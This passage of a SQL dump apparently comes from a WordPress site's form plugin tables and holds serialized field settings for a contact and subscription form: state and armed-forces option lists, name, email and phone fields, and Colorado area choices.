Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:49;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Wisconsin\";s:5:\"value\";s:2:\"WI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"49\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:50;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Wyoming\";s:5:\"value\";s:2:\"WY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"50\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:51;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Washington DC\";s:5:\"value\";s:2:\"DC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"51\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:52;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:51:\"ARMED FORCES AFRICA \\ CANADA \\ EUROPE \\ MIDDLE EAST\";s:5:\"value\";s:2:\"AE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"52\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:53;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:36:\"ARMED FORCES AMERICA (EXCEPT CANADA)\";s:5:\"value\";s:2:\"AA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"53\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:54;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:20:\"ARMED FORCES PACIFIC\";s:5:\"value\";s:2:\"AP\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"54\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8721,188,'personally_identifiable','','personally_identifiable',''),(8722,188,'value','','value',''),(8723,189,'field_label','Last Name','field_label','Last Name'),(8724,189,'field_key','lastname_70','field_key','lastname_70'),(8725,189,'custom_name_attribute','lname','custom_name_attribute','lname'),(8726,189,'personally_identifiable','1','personally_identifiable','1'),(8727,189,'value','','value',''),(8728,190,'field_label','Email','field_label','Email'),(8729,190,'field_key','email_71','field_key','email_71'),(8730,190,'custom_name_attribute','email','custom_name_attribute','email'),(8731,190,'personally_identifiable','1','personally_identifiable','1'),(8732,190,'value','','value',''),(8733,191,'field_label','Phone','field_label','Phone'),(8734,191,'field_key','phone_72','field_key','phone_72'),(8735,191,'custom_name_attribute','phone','custom_name_attribute','phone'),(8736,191,'personally_identifiable','1','personally_identifiable','1'),(8737,191,'value','','value',''),(8738,192,'field_label','Your Local Area','field_label','Your Local Area'),(8739,192,'field_key','listselect_73','field_key','listselect_73'),(8740,193,'field_label','hr','field_label','hr'),(8741,193,'field_key','hr_74','field_key','hr_74'),(8742,194,'field_label','Northwest Leadership Positions','field_label','Northwest Leadership Positions'),(8743,194,'field_key','html_75','field_key','html_75'),(8744,195,'field_label','Select the person you would like to email','field_label','Select the person you would like to email'),(8745,195,'field_key','listselect_76','field_key','listselect_76'),(8746,196,'field_label','Enter Your Message Here','field_label','Enter Your Message Here'),(8747,196,'field_key','textarea_77','field_key','textarea_77'),(8748,196,'value','','value',''),(17469,621,'label','HTML','label','HTML'),(17470,621,'type','html','type','html'),(17468,621,'idAttribute','id','idAttribute','id'),(8751,198,'field_label','Submit','field_label','Submit'),(8752,198,'field_key','submit_79','field_key','submit_79'),(8762,201,'custom_name_attribute','lname','custom_name_attribute','lname'),(8763,201,'personally_identifiable','1','personally_identifiable','1'),(8764,201,'value','','value',''),(8765,202,'field_label','Email','field_label','Email'),(8766,202,'field_key','email_156','field_key','email_156'),(8767,202,'custom_name_attribute','email','custom_name_attribute','email'),(8768,202,'personally_identifiable','1','personally_identifiable','1'),(8769,202,'value','','value',''),(8770,203,'field_label','Phone','field_label','Phone'),(8771,203,'field_key','phone_157','field_key','phone_157'),(8772,203,'custom_name_attribute','phone','custom_name_attribute','phone'),(8773,203,'personally_identifiable','1','personally_identifiable','1'),(8774,203,'value','','value',''),(8775,204,'field_label','Your Local Area','field_label','Your Local Area'),(8776,204,'field_key','listselect_158','field_key','listselect_158'),(5252,182,'container_class','','container_class',''),(5253,182,'element_class','','element_class',''),(5254,182,'admin_label','','admin_label',''),(5255,182,'help_text','','help_text',''),(5256,182,'parent_id','17','parent_id','17'),(5257,183,'objectType','Field','objectType','Field'),(5258,183,'objectDomain','fields','objectDomain','fields'),(5259,183,'editActive','','editActive',''),(5260,183,'order','6','order','6'),(5261,183,'type','listcountry','type','listcountry'),(5262,183,'label','Country','label','Country'),(5263,183,'key','listcountry_1550094096365','key','listcountry_1550094096365'),(5264,183,'label_pos','default','label_pos','default'),(5265,183,'required','1','required','1'),(5266,183,'options','a:3:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:3:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8718,188,'field_label','First Name','field_label','First Name'),(8719,188,'field_key','textbox_69','field_key','textbox_69'),(8720,188,'custom_name_attribute','','custom_name_attribute',''),(5267,183,'container_class','','container_class',''),(5268,183,'element_class','','element_class',''),(5269,183,'admin_label','','admin_label',''),(5270,183,'help_text','','help_text',''),(5271,183,'default','US','default','US'),(5272,183,'parent_id','17','parent_id','17'),(5273,184,'objectType','Field','objectType','Field'),(5274,184,'objectDomain','fields','objectDomain','fields'),(5275,184,'editActive','','editActive',''),(5276,184,'order','7','order','7'),(5277,184,'label','Choose your subscription(s)','label','Choose your subscription(s)'),(5278,184,'type','listmultiselect','type','listmultiselect'),(5279,184,'key','choose_your_subscription_s_1550099095640','key','choose_your_subscription_s_1550099095640'),(5280,184,'label_pos','above','label_pos','above'),(5281,184,'required','1','required','1'),(5282,184,'options','a:3:{i:0;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:16:\"Colorado Springs\";s:5:\"value\";s:16:\"Colorado Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:1;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:41:\"Central Colorado - ECK Temple in Colorado\";s:5:\"value\";s:41:\"Central Colorado - ECK Temple in Colorado\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 